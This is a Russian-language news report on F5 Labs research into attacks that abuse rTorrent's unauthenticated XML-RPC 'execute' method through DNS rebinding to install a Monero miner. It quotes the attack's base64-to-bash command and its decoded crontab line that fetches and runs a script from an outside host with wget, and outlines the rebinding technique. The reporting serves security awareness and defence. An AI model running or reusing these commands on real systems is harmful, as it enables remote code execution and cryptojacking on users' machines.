Исследователи из компании F5 выявили (https://f5.com/labs/articles/threat-intelligence/malware/rto...) волну атак на пользовательские системы, в которых запущен свободный консольный torrent-клиент rTorrent (https://rakshasa.github.io/rtorrent/), использующий XML-RPC для взаимодействия с фронтэндами с реализацией интерфейсов пользователя.
Для выполнения своего кода в системе атакующие эксплуатируют особенность реализации XML-RPC в rTorrent, в которой не отключён метод "execute", позволяющий выполнить любой shell-код в системе. В ходе атаки в систему устанавливается собранный для unix-подобных систем инструментарий для майнинга криптовалюты Monero (XMR). На текущий момент на одном из связанных с атакой кошельков уже накопилось 13 XMR, что соответствует примерно 4200 долларам США.
Как и в случае с недавней уязвимостью (https://www.opennet.ru/opennews/art.shtml?num=47912) в BitTorrent-клиенте Transmission, интерфейс XML-RPC в rTorrent доступен без аутентификации и включает команды, которые можно использовать для выполнения кода в системе. По умолчанию rTorrent принимает запросы только на внутреннем интерфейсе localhost (127.0.0.1), недоступном из вне, поэтому для отправки команд атакующие применяют технику "DNS rebinding (https://www.opennet.ru/opennews/art.shtml?num=27533)". Атака производится когда пользователь открывает в браузере подконтрольные злоумышленнику страницы на системе в которой также выполняется rTorrent.
Выполняемый в браузере JavaScript-код отправляет произвольный запрос на localhost через вызов XMLHttpRequest(). Для обхода защиты от выхода за пределы области текущего домена (cross-origin) используется метод смены имени хоста в DNS - на DNS-сервере атакующих настраивается поочерёдная отдача двух IP-адресов: на первый запрос отдаётся реальный IP сервера со страницей, а затем возвращается 127.0.0.1. Время жизни (TTL) для первого ответа выставляется в минимальное значение, поэтому при открытии страницы браузер определяет реальный IP сервера атакущего и загружает содержимое страницы. На странице запускается JavaScript-код, который ожидает истечения TTL и отправляет второй запрос, который теперь определяет хост как 127.0.0.1, что приводит к обращению к внутреннему сетевому интерфейсу компьютера пользователя без ограничений cross-origin.
Первым делом атакующие отправляют проверочный POST запрос с XML-RPC-методом "download_list". Если запрос обработан успешно, следом отправляется запрос "execute", в ходе которого на системе пользователя выполняется команда
echo KGNy...tCg== |base64 -d|bash
которая после декодирования из формата base64 преоборазуется в
(crontab -l 2>/dev/null|sed '/wget/d'; echo "5 * * * * wget -qO- lyzhenko.ru/.r|bash")|crontab –
Указанный код прописывает в crontab загрузку основного скрипта, который вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам "miner", "xmr", "wnTKYg", "imWBR" и "ddg", а также убивает все процессы sshd.
Далее устанавливается соединение со скрытым сервисом Tor c которого загружается непосредственно приложение для майнинга. Для доступа к Tor применяется шлюз Tor2Web, позволяющий обратиться к скрытому сервису без установки Tor при помощи обычного web-запроса.
URL: https://f5.com/labs/articles/threat-intelligence/malware/rto...
Новость: https://www.opennet.ru/opennews/art.shtml?num=48177
